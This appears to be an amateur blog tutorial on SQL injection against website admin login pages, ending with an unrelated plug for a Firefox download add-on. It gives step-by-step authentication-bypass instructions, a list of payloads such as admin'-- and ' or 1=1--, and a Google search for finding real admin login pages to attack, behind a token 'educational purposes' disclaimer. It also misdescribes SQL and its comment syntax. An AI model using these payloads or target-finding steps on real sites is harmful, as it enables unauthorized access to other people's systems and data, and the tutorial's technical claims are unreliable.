SQL , often referred to as
Structured Query Language,
is a database computer language designed for managing data in
relational database management systems (RDBMS), and originally based
upon relational algebra and calculus. Its scope includes data insert,
query, update and delete, schema creation and modification, and data
access control.
{Wikipedia Definition}
In a nutshell, SQL is the most user friendly Web Programming language highly used and appreciated.
SQL INJECTION:
"An attack technique used to exploit web sites by altering backend SQL statements through manipulating application input."
- Web Application Security Consortium Glossary
OR It is a way by which people can exploit the user-friendliness of the server and use it to gain data access etc.
SQL website servers are generally saved as formats of .php or .asp or .aspx
SQL language is simply based upon certain codes which can be exploited easily unless and until taken care of.
If you get across a SQL server , look out for the following.
First of all you need to get to the administrator or login pages of a website.
{It may take time to find one , Will explain the ways to find the admin page later }
CHECKING FOR VULNERABILITIES:
First of all we need to find whether the server is vulnerable to SQL injection or not.
In the admin login page,
In the username enter a single character
apostrophe that is
'
and in the password field enter a single character
equal that is
=
press login.
If the page shows an error report like
Internal Server Error or
LANGUAGE NOT DEFINED , etc. , then the website is vulnerable to sql injection.
Now,
Open the source page of the website, {In firefox open the
View column and click on page s
ource}
look for something like
<form><input></input>
<input></input>
<input></input>
</form>
OR
SELECT * FROM members WHERE username = 'user' AND password = 'password'
Now here comes the Hack Exploit,
When in the main page , We type username in the username box , the script changes to "username='hellboyuser'"
Now the hack
Got to the main page and in the Username box type
admin'--
what it means,
it will change the script to "username='admin'--'"
the two hashes
-- in the script language means IGNORE THE REST, which mean the script will ignore the password area.
So
-
- SELECT * FROM members WHERE username = 'admin'--'|||||| AND password = 'password'
This is going to log you as admin user, because rest of the SQL query will be ignored.
|||| shows that the rest of the code will be ignored.
Coming back,
In the username type admin'-- and leave out the password field , press login and get access to the administrator page.
EXCEPTIONS:
Some website programmers know this hack so you may need to enter multiple passwords
Eg:
In the username type
admin
In the password type
'or''='
also try out these attributes ,
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
' or 1=1#
Works fantastic.
This hack doesn't work on all websites and I prefer you not to try it on any legal website.
To find the vulnerable sites , go to google and search,
inurl:/adminlogin.asp
this search brings out the admin login pages of many website,
try on own risk.
THIS PAGE IS FOR EDUCATIONAL PURPOSES ONLY.
TRY ON UR OWN
If
you are a regular downloader and love to download all kinds of stuff
from Internet and you do not use any kind of download managers than
FireDownload can be your best alternate which when combined with Firefox
will provide you 10 times acceleration on your downloads so that means
you will get state of the art download speed without even spending a
penny because this add-on is available for free.
. 
